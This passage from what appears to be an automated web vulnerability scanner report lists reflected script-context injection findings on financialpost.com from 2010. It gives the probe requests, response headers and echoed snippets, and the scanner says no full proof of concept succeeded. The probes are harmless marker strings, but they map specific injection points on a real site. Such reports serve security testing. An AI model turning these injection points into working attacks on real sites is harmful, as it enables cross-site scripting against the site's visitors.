<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news3c300';c784a23242d/fp500/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news3c300';c784a23242d;kw=fp500;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=54857449?">
...[SNIP]...

1.166. http://www.financialpost.com/news/FP500/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/FP500/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5c6d'%3bfe08f537a24 was submitted in the REST URL parameter 2. This input was echoed as f5c6d';fe08f537a24 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/FP500f5c6d'%3bfe08f537a24/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43189


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/fp500f5c6d';fe08f537a24/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=fp500f5c6d';fe08f537a24;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=78333243?">
...[SNIP]...

1.167. http://www.financialpost.com/news/business-insider/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/business-insider/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ff81'%3b99734784d32 was submitted in the REST URL parameter 1. This input was echoed as 8ff81';99734784d32 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news8ff81'%3b99734784d32/business-insider/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37601


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news8ff81';99734784d32/business-insider/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news8ff81';99734784d32;kw=business-insider;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=20891770?">
...[SNIP]...

1.168. http://www.financialpost.com/news/business-insider/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/business-insider/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72d86'%3b8b9d58f9044 was submitted in the REST URL parameter 2. This input was echoed as 72d86';8b9d58f9044 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-insider72d86'%3b8b9d58f9044/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43410


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/business-insider72d86';8b9d58f9044/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=business-insider72d86';8b9d58f9044;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=25473940?">
...[SNIP]...

1.169. http://www.financialpost.com/news/business-insider/ways+nail+first+impression/3987967/story.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/business-insider/ways+nail+first+impression/3987967/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91d79'%3b8edda2a7d69 was submitted in the REST URL parameter 1. This input was echoed as 91d79';8edda2a7d69 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news91d79'%3b8edda2a7d69/business-insider/ways+nail+first+impression/3987967/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76139
Expires: Sun, 19 Dec 2010 03:10:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news91d79';8edda2a7d69/business-insider/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news91d79';8edda2a7d69;kw=business-insider;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=83631043?">
...[SNIP]...

1.170. http://www.financialpost.com/news/business-insider/ways+nail+first+impression/3987967/story.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/business-insider/ways+nail+first+impression/3987967/story.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e64d5'%3be02aad2f8d9 was submitted in the REST URL parameter 2. This input was echoed as e64d5';e02aad2f8d9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-insidere64d5'%3be02aad2f8d9/ways+nail+first+impression/3987967/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 83435
Expires: Sun, 19 Dec 2010 03:10:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/business-insidere64d5';e02aad2f8d9/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=business-insidere64d5';e02aad2f8d9;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=30835417?">
...[SNIP]...

1.171. http://www.financialpost.com/news/business-insider/ways+nail+first+impression/3987967/story.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/business-insider/ways+nail+first+impression/3987967/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7bf26'%3b4023866e636 was submitted in the REST URL parameter 4. This input was echoed as 7bf26';4023866e636 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-insider/ways+nail+first+impression/39879677bf26'%3b4023866e636/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78912
Expires: Sun, 19 Dec 2010 03:11:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/business-insider/ways-nail-first-impression/39879677bf26';4023866e636/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=business-insider;kw=ways-nail-first-impression;kw=39879677bf26';4023866e636;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surro
...[SNIP]...

1.172. http://www.financialpost.com/news/business-insider/ways+nail+first+impression/3987967/story.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/business-insider/ways+nail+first+impression/3987967/story.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7885c'%3b6d8892f2062 was submitted in the REST URL parameter 5. This input was echoed as 7885c';6d8892f2062 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-insider/ways+nail+first+impression/3987967/7885c'%3b6d8892f2062 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44327


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/business-insider/ways%20nail%20first%20impression/3987967/7885c';6d8892f2062/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=business-insider;kw=ways%20nail%20first%20impression;kw=3987967;kw=7885c';6d8892f2062;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcooki
...[SNIP]...

1.173. http://www.financialpost.com/news/economy/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/economy/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7cb9'%3b332834b26ae was submitted in the REST URL parameter 1. This input was echoed as c7cb9';332834b26ae in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /newsc7cb9'%3b332834b26ae/economy/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43266


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/newsc7cb9';332834b26ae/economy/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=newsc7cb9';332834b26ae;kw=economy;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=71562567?">
...[SNIP]...

1.174. http://www.financialpost.com/news/economy/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/economy/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23396'%3bcca2d7dd2c5 was submitted in the REST URL parameter 2. This input was echoed as 23396';cca2d7dd2c5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/economy23396'%3bcca2d7dd2c5/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43230


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/economy23396';cca2d7dd2c5/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=economy23396';cca2d7dd2c5;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=97048384?">
...[SNIP]...

1.175. http://www.financialpost.com/news/economy/Europe+North+America/3996015/story.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/economy/Europe+North+America/3996015/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cfab'%3bb5657ebc138 was submitted in the REST URL parameter 1. This input was echoed as 2cfab';b5657ebc138 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news2cfab'%3bb5657ebc138/economy/Europe+North+America/3996015/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 77584
Expires: Sun, 19 Dec 2010 03:10:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news2cfab';b5657ebc138/economy/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news2cfab';b5657ebc138;kw=economy;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=98496123?">
...[SNIP]...

1.176. http://www.financialpost.com/news/economy/Europe+North+America/3996015/story.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/economy/Europe+North+America/3996015/story.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4482'%3b595e9a6b3a0 was submitted in the REST URL parameter 2. This input was echoed as e4482';595e9a6b3a0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/economye4482'%3b595e9a6b3a0/Europe+North+America/3996015/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 90835
Expires: Sun, 19 Dec 2010 03:10:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/economye4482';595e9a6b3a0/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=economye4482';595e9a6b3a0;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=28719133?">
...[SNIP]...

1.177. http://www.financialpost.com/news/economy/Europe+North+America/3996015/story.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/economy/Europe+North+America/3996015/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e012'%3bed7a07312f0 was submitted in the REST URL parameter 4. This input was echoed as 2e012';ed7a07312f0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/economy/Europe+North+America/39960152e012'%3bed7a07312f0/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69569
Expires: Sun, 19 Dec 2010 03:10:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/economy/europe-north-america/39960152e012';ed7a07312f0/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=economy;kw=europe-north-america;kw=39960152e012';ed7a07312f0;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=160
...[SNIP]...

1.178. http://www.financialpost.com/news/economy/Europe+North+America/3996015/story.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/economy/Europe+North+America/3996015/story.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d6b5'%3b2734327df9e was submitted in the REST URL parameter 5. This input was echoed as 5d6b5';2734327df9e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/economy/Europe+North+America/3996015/5d6b5'%3b2734327df9e HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
